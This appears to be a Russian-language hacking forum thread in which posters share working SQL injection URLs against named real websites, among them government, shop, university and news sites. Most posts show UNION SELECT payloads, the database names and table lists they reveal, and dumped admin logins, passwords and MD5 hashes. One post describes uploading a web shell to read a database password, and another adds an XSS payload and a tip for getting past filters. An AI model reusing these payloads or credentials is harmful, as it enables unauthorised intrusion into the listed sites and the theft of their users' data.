SQL Инъекции

GOV

Username: itadmin_mitwus@localhost
Version: 5.0.51a-community
Dbname: itadmin_intranet

около 96 таблиц,но...

 

http://www.commercialistifrosinone.com/all_news.php?id=288=null%20union%20all%20select%200,1,2,SQL--

version() => 5.0.51a-community
database() => commerci_site
user() => commerci_site@localhost

БД:

Code:

 
	commerci_site

Таблицы commerci_site:

Code:

	livehelp_channels
	livehelp_config
	livehelp_departments
	livehelp_identity_daily
	livehelp_identity_monthly
	livehelp_keywords_daily
	livehelp_keywords_monthly
	livehelp_layerinvites
	livehelp_leavemessage
	livehelp_messages
	livehelp_modules
	livehelp_modules_dep
	livehelp_operator_channels
	livehelp_operator_departments
	livehelp_operator_history
	livehelp_paths_firsts
	livehelp_paths_monthly
	livehelp_qa
	livehelp_questions
	livehelp_quick
	livehelp_referers_daily
	livehelp_referers_monthly
	livehelp_sessions
	livehelp_smilies
	livehelp_transcripts
	livehelp_users
	livehelp_visit_track
	livehelp_visits_daily
	livehelp_visits_monthly
	news
	newsletter

www.curacaodolphintherapy.com/main.php?id=6=null union all select 0,1,SQL,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23


version() => 5.0.37-log
database() => curacaodolphin
user() => curacaodolphindb@localhost

БД:

Code:

	curacaodolphin

Таблицы curacaodolphin:

Code:

	fotoalbum
	imagelibrary
	menuitems
	menusubitems
	modules
	oemp_administrator_activities
	oemp_administrator_dashboard
	oemp_administrator_emails
	oemp_administrator_limits
	oemp_administrator_pluginprivs
	oemp_administrator_privs
	oemp_administrator_shortcuts
	oemp_administrators
	oemp_archive_list
	oemp_archive_list_campaigns
	oemp_archive_rss
	oemp_archive_rss_campaigns
	oemp_asp
	oemp_autoresponders
	oemp_autoresponders_attachments
	oemp_bounce_codes
	oemp_bounce_log
	oemp_bounce_types
	oemp_branding
	oemp_campaigns
	oemp_campaigns_attachments
	oemp_campaigns_clients
	oemp_campaigns_cms
	oemp_campaigns_cms_refs
	oemp_campaigns_content
	oemp_campaigns_forward
	oemp_campaigns_forward_detailed
	oemp_campaigns_labels
	oemp_campaigns_linkclicks
	oemp_campaigns_linkclicks_detailed
	oemp_campaigns_maillists
	oemp_campaigns_outbo
	oemp_campaigns_rating
	oemp_campaigns_rating_detailed
	oemp_campaigns_read
	oemp_campaigns_read_detailed
	oemp_campaigns_rules
	oemp_campaigns_schedule
	oemp_campaigns_schedule_recursive
	oemp_campaigns_smtp
	oemp_campaigns_statistics
	oemp_campaigns_tracks
	oemp_campaigns_unsubscriptions
	oemp_clients
	oemp_config
	oemp_cron
	oemp_cron_optreminder
	oemp_customfields
	oemp_customreports
	oemp_emails
	oemp_followups
	oemp_followups_track
	oemp_integration_screens
	oemp_labels
	oemp_linkclicks
	oemp_linkclicks_detailed
	oemp_maillist_administrators
	oemp_maillist_aliases
	oemp_maillist_autoresponders
	oemp_maillist_banned
	oemp_maillist_blacklist
	oemp_maillist_clients
	oemp_maillist_customfields
	oemp_maillist_emails
	oemp_maillist_followups
	oemp_maillist_members
	oemp_maillist_messages
	oemp_maillist_pop3
	oemp_maillist_smtp
	oemp_maillists
	oemp_members
	oemp_members_activities
	oemp_members_activities_detailed
	oemp_news
	oemp_news_recipients
	oemp_newsletter_templates
	oemp_periodicprocesses
	oemp_plg0005_emails
	oemp_plg0005_maillists
	oemp_plg0005_reminders
	oemp_plg0005_sendlog
	oemp_plg0005_sendreport
	oemp_plg0008_translations
	oemp_plg0008_translations_board
	oemp_plugins
	oemp_plugins_contentprocesses
	oemp_plugins_processes
	oemp_plugins_tags
	oemp_pop3_servers
	oemp_process_log
	oemp_read
	oemp_read_detailed
	oemp_smtp_servers
	oemp_statistics_actions
	oemp_tabledependencies
	rightarea
	team
	users [username, password, admin, lastlogin] 
	vacancies

 

Еще немного:

user() - ingbretsen@localhost
version () - 5.0.37-log
database() - ingbretsen

user() - [email protected]
version () - 4.0.30-log
database() - u10037433

user() - [email protected]
version () - 4.1.25-Debian_mt1
database() - dahlenassociates_com_-_dahlenas

user() - strangefortune@localhost
version () - 4.0.20-standard
database() - salo

user() - [email protected]
version () - 4.0.27-max-log
database() - db172586143

SHOP
user() - trishield@localhost
version () - 5.0.21-standard
database() - trishield_new

как оказалось баян!

user() - [email protected]
version () - 4.0.15-nt
database() - student
(сам сайт защишен авторизацией на ява-скрипте! =) напомнило Античат-квест! (; )

 

http://www.ciritas.ru/product.php?id=-15+union+select+1,2,3,4,5,67,8,/*
user:ciritas5_website@localhost
version:4.1.22-log
database:ciritas5_ciritas

 

culturagay ROFL

Code:

http://www.culturagay.it/cg/schedaLibro.php?id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*

 

Code:

http://moritzlaw.osu.edu/electionlaw/maps/maps.php?ID=69+union+select+1,2,user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*

user() - [email protected]
database() - moritzdb2
version() - 5.0.27

 

Code:

http://www.cairngorms.co.uk/park/visitors/eventsdiary/maps.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4%20LIMIT%201,1/*

 

http://priluki.info/cgi-bin/foto.cgi?showgallery=-1+union+select+1,concat_ws(0x3a3a,name,pass,user),3,4,5,6,7+from+users+limit+0,1

login:OLEX
pass:12321

Хохляцкий портал города Прилуки....

 

http://www.fuckmachines.de/index.php?page=kategorie&catId=-1+union+select+1,2,concat_ws(0x3a3a,password)+from+admin_user+limit+0,1/*

http://www.fuckmachines.de/admin

не брутится...

 

Code:

http://www.hook.tv/groups.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3%20LIMIT%201,1/*

 

http://www.obereg.ru/zagorod.html?id=1537+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/*
Version():4.1.11-standard
User()bereg@localhost
-----
http://sao.mos.ru/?r=9_doc&cat=1+union+select+1,unhex(hex(version())),3
version:4.1.12
user:sao1@chicken
------
http://advertising.koeln-bonn-airport.de/index.php?id=-4+union+select+concat_ws(0x3a,user,password),2+from+mysql.user/*
Вывод в титле:
root:32a6457455517e7f
есть доступ в mysql.user

 

грузинский сайт:

http://www.geoimport.ge

Code:

http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(version(),user(),database()),15,16,17,18,19,20,21,22,23--

version() - 5.0.51
user() - geoimport_ge@localhost
database() - geoimport_ge

Версия > 5 => есть information_schema:

Code:

http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+1,1--

Перебираем лимитом. Видим интересную таблицу:
c_config. Рассматриваем ее тоже лимитом:

Code:

http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x635f636f6e666967+limit+1,1--

Ничего интересного, идем далее.
Приступаем к ее изучению:

Code:

http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x635f6d656d62657273+limit+1,1--

Сразу же находим username. Записываем в память
Нашел таблицу c_members, но та бесполезная...
Находим еще кое что интересное: c_users...
Идем далее...
Находим login и password...
Выводим:

Code:

http://www.geoimport.ge/index.php?lang=eng&id=-53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(login,0x3a,password),15,16,17,18,19,20,21,22,23+from+c_users--

Result:
admin:geoneo2008

Ну в админке там ваше шелл лить - нет проблем)))

С помощью шелла узнал в конфиге ето:

server: localhost
db_username (and db_name): geoimport_ge
db_pass: x3f5h6a54sdg

 

Dbname: amayze2
Version: 5.0.27-standard-log
Username: [email protected]

 

http://www.sotovikm.ru

http://www.sotovikm.ru/tovar.php?ID=11023+union+select+1,2,3,4,5,6,7,8,9,10,concat(table_schema,0x3a,table_name,0x3a,column_name)+from+information_schema.columns--

http://www.sotovikm.ru/tovar.php?ID=11023+union+select+1,2,password,4,5,6,7,8,9,10,name+from+auth--

login: admin
Pass: pavel

 

http://stories.pageforyou.ru/story.php?id=127&id_auth=-1+union+select+concat_ws(0x3a3a,login,password),2,3+from+authors+limit+0,1/*

Странно пас выводится, или с кодировками залупа или черт пойми что еще....

 

http://www.kelbike.fr/search.php?q=deda&pmin=&pmax=&brand=&limite=80&ps=&po=&pv=&ls=0&ct=-1/**/UNION/**/SELECT/**/version(),2,3/**/limit/**/1,1/*

5.0.32-Debian_7etch6-log

+ XSS:

http://www.kelbike.fr/search.php?merchantid=118&brand=AVID&ps=%22%3E%3Csсriрt%3Ealert%28%27Pashkela%27%29%3C%2Fsсriрt%3E%3C%22&po=&pv=&ls=1&pmin=3&pmax=40

 

Газета Русский Курьер

Code:

http://ruscourier.ru/archive.php?id=-1+union+select+database()/*
http://ruscourier.ru/archive.php?id=-1+union+select+user()/*
http://ruscourier.ru/archive.php?id=-1+union+select+version()/*

database() = ruscouru
user() = ruscouru@localhost
version() = 5.0.26-lk-log

запросы выборки из таблиц следует отправлять методом POST, так как некоторые ключевые слова фильтруются хостингом . Удобно использовать плагин для firefox: _https://forum.antichat.ru/thread56473.html
от [53x]Shadow

в базе данных есть следующие таблицы:

Code:

banners
bigpoll_answ
bigpoll_quest
block
categories
comments
hot
issue
menu
news
points
rubr
sympoll_auth
sympoll_data
sympoll_iplog
sympoll_list
templates

в таблице sympoll_auth такие поля:

Code:

uid
user
pass
access
secret

В sympoll_auth 2 записи, выборка содержимого таблицы делается примерно так:

Code:

http://ruscourier.ru/archive.php?id=-1+union+select+user+from+sympoll_auth+where+uid=1+limit+1/*
http://ruscourier.ru/archive.php?id=-1+union+select+pass+from+sympoll_auth+where+uid=1+limit+1/*
http://ruscourier.ru/archive.php?id=-1+union+select+secret+from+sympoll_auth+where+uid=1+limit+1/*

соответсвенно и для uid=2

Содержимое таблицы sympoll_auth:

Code:

user:ruscouru
pass:19635f485c127dc207f32fa1e2157779:ufptnf
secret:db447e070183f8b93ddc30b7a1d2472b:1203592175
access:

user:ruscour
pass:9c47efd296e2d077273e01df82314736:flvbyrf
secret:61e598f9762fd92e568b8334f0498476:1205516158 
access:1

(хэши md5)
можно заметить что ufptnf в русской раскладке "газета" а flvbyrf - "админка". Для чего предназначено поле secret пока не очень понятно.

по этому адресу скорее всего расположена админка
_http://ruscourier.ru/admin
с HTTP-авторизацией.
к сожалению никакие пароли и их комбинации с полем secret к ней не подходят.
Может у кого-то получится больше.

 

Вот еще кучка свеженьких!

Некоторые из них магазины, в некоторых есть админки, некоторые просто так, для изучения! =)

 

Вот что получилось...

admin : 5d2167c87d363636
OHM 2007 : 0643078c5a5c0f3b


Сайт топ гильдии в игре Rfonline.

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,2,3--

 

В добавку к выше указанным!

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name)+from+information_schema.columns+limit+628,1--

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,concat(converge_id,0x3a,converge_pass_hash,0x3a,converge_pass_salt),3+from+forum.cf_members_converge+limit+1,1--

http://www.chaos-online.ru/?action=read_news&id=-1+union+select+1,concat(id,0x3a,name,0x3a,email),3+from+forum.cf_members+limit+1,1--